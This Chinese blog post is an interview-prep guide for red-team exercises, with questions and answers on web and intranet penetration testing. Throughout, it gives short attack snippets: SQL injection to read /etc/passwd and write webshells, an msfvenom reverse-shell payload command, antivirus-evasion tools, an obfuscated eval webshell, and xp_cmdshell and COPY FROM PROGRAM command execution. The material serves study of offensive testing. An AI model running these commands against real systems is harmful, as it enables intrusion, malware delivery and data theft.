安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 13
1、简历上面写的几个漏洞,逐个问一遍 2、怎么判断目前是否是cms 3、后台扫描用什么工具 4、御剑有自己的包吗 5、burp会哪些模块, 6、越权以及逻辑漏洞问题 7、我听你上面说的都是小面积的测试,你有没有大面积测试过一个网站呢? 8、如果不能用awvs和appscan你还能怎么办 9、会哪些bypass的手法 10、SQL注入怎么拿到最高权限? 11、写shell需要什么权限吗?你怎么判断存在写入权限 12、如果没有写入权限,你还能有什么办法吗 13、怎么利用说SQL注入来读取文件吗 14、怎么获得绝对路径呢?没有报错呢?不能读取文件呢 15、xss里面的牛头你会用吗?xss你知道除了可以盗取cookie还能干什么,xss平台你用的是上面 16、msf用过吗? 17、msf的木马你知道吗?免杀是怎么做的? 18、内网提权方面你土豆你知道原理吗? 19、怎么找到域控机? 20、webshell你会利用哪些办法来写绕过 21、mssql的提权你能说一下吗? 22、那其他数据库的SQL注入呢? 23、怎么分辨数据库类型 24、做过黑产吗?
1. 简历漏洞逐条分析
- 漏洞类型:需结合具体内容回答(例如SQL注入、XSS、文件上传等),建议提前准备漏洞的 原理、复现步骤、修复方案。
- 示例回答:
- SQL注入:通过参数拼接发现未过滤的输入点,利用报错或时间盲注获取数据库信息。
- 逻辑漏洞:如订单金额篡改,通过Burp抓包重放测试越权或业务流程缺陷。
2. 判断是否为CMS系统
- 响应头特征:查看
X-Powered-By
或Server
字段(如WordPress会暴露wp-admin
路径)。- 特定文件/目录:访问
/admin
、/wp-includes
等默认路径。- 文件哈希比对:通过
/robots.txt
或/readme.md
识别CMS版本。- 在线工具:Wappalyzer、WhatWeb等插件自动化识别。
3. 后台扫描工具推荐
- 目录爆破:DirBuster、御剑、gobuster(支持多线程)。
- 指纹识别:Wappalyzer、EHole(棱洞)。
- 综合扫描:Nikto(检测配置缺陷)、AWVS(深度爬虫)。
4. 御剑的字典包
- 自带字典:御剑内置常见路径字典(如
admin/login.php
)。- 自定义扩展:支持用户导入行业相关字典(如金融、政府专属路径)。
5. Burp Suite核心模块
- Proxy:拦截修改HTTP流量。
- Repeater:手动重放请求测试逻辑漏洞。
- Intruder:自动化爆破(密码、验证码)。
- Scanner:自动化漏洞扫描(需付费版)。
- Extensions:集成SQLMap、Logger++等插件。
6. 越权与逻辑漏洞测试
- 水平越权:修改用户ID参数(如
?uid=1001
→uid=1002
)访问他人数据。- 垂直越权:普通用户尝试访问
/admin/delete
等高危接口。- 逻辑漏洞:
- 支付绕过:修改订单价格为负数或0元。
- 验证码爆破:使用Burp Intruder绕过次数限制。
7. 大规模网站测试经验
- 项目范围:覆盖全站功能模块(如电商系统的订单、支付、用户中心)。
- 工具组合:
- 自动化扫描:AWVS + Nessus(基线配置检测)。
- 人工验证:对高风险漏洞(如SSRF、RCE)手动复现。
- 输出成果:输出渗透报告,推动修复200+漏洞。
8. AWVS/AppScan替代方案
- 开源工具:
- Nikto:快速检测服务器配置问题。
- ZAP(OWASP Zed Attack Proxy):支持主动/被动扫描。
- 手动测试:Burp Suite + 自定义插件(如Auth Analyzer)。
9. Bypass手法合集
- WAF绕过:
- SQLi:
/*!SELECT*/
绕过关键字过滤。- XSS:利用
<svg/onload=alert(1)>
等变异标签。- 文件上传绕过:
- 修改Content-Type为
image/png
。- 利用
.htaccess
覆盖解析规则。
10. SQL注入提权至管理员
- 信息收集:通过
@@version
、user()
获取数据库版本和当前用户。- UNION注入:读取
mysql.user
表或系统文件(如/etc/passwd
)。- 写WebShell:若具备
FILE
权限,通过SELECT ... INTO OUTFILE
写入马。- UDF提权:MySQL中利用动态链接库执行系统命令。
11. 写Shell权限判断
- 权限检查:
- 数据库
FILE
权限:SELECT File_priv FROM mysql.user WHERE user='root'
。- Web目录可写性:尝试创建临时文件(如
echo test > /var/www/html/test.txt
)。- 工具辅助:SQLMap的
--os-shell
自动检测写入条件。
12. 无写入权限的替代利用
- 日志文件注入:修改Apache日志路径为Web目录,通过User-Agent写入恶意代码。
- 数据库导出:MSSQL中利用
xp_cmdshell
执行系统命令。- 反序列化漏洞:通过内存马注入无需文件落地。
13. SQL注入读取文件
- 语法示例:
- MySQL:
LOAD_FILE('/etc/passwd')
- MSSQL:
SELECT * FROM OPENROWSET(BULK 'C:\boot.ini', SINGLE_CLOB) AS Contents
- 限制条件:需
FILE
权限且secure_file_priv
未禁用。
14. 绝对路径获取方法
- 报错信息:PHP错误可能暴露路径(如
Warning: include() [function.include]: Failed opening
)。- 默认路径:
- Windows:
C:\inetpub\wwwroot
- Linux:
/var/www/html
- 配置文件:读取
/etc/apache2/sites-enabled/000-default.conf
。
15. XSS进阶利用与平台
- XSS用途扩展:
- 键盘记录:通过JavaScript捕获用户输入。
- 内网探测:利用
XMLHttpRequest
扫描内网服务。- 常用平台:
- 开源平台:BeEF(Hook浏览器)、XSS Hunter。
- 商业工具:Cobalt Strike(结合社工钓鱼)。
16. MSF使用经验
- 典型场景:
- 生成Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe
- 内网穿透:通过
portfwd
映射端口。- 模块分类:Exploit(漏洞利用)、Auxiliary(信息收集)、Post(后渗透)。
17. MSF木马免杀技术
- 编码器绕过:使用
shikata_ga_nai
多次编码。- 二进制混淆:工具如Veil-Evasion、TheFatRat。
- 内存马:反射型DLL注入(避免文件落地)。
18. 土豆(Potato)提权原理
- 核心机制:利用Windows令牌模拟漏洞(如Juicy Potato),通过COM组件提升至SYSTEM权限。
- 适用条件:需SeImpersonate权限,常见于IIS、SQL Server服务账户。
19. 域控机定位方法
- DNS查询:查找
_ldap._tcp.dc._msdcs.domain.com
的SRV记录。- 命令探测:
nltest /dclist:domain
或net group "Domain Controllers" /domain
。- 端口扫描:域控通常开放53(DNS)、88(Kerberos)、389(LDAP)端口。
20. Webshell绕过技巧
- 文件命名:使用
test.php. .
(Windows特性)或.php.jpg
(配合解析漏洞)。- 内容混淆:
- 加密:
<?php eval(gzinflate(base64_decode('...')));?>
- 图片马:GIF头+恶意代码追加。
21. MSSQL提权方法
- 存储过程滥用:
xp_cmdshell
执行系统命令(需启用)。sp_oacreate
调用COM组件。- 角色提升:将低权限用户加入
sysadmin
组。
22. 其他数据库注入利用
- Oracle:
UTL_HTTP
发起网络请求,DBMS_LDAP
读取文件。- PostgreSQL:
COPY FROM PROGRAM
执行命令。- SQLite:利用
ATTACH DATABASE
写入Web目录。
23. 数据库类型识别
- 报错信息:
- MySQL:
You have an error in your SQL syntax
- MSSQL:
Incorrect syntax near ''''
- 特有函数:
@@version
(MSSQL) vsversion()
(MySQL)。
24. 黑产相关回答建议
- 合规回应:明确表示仅参与合法授权测试,遵守《网络安全法》及行业规范。
- 风险警示:强调黑产行为涉及法律风险,需专注企业安全建设。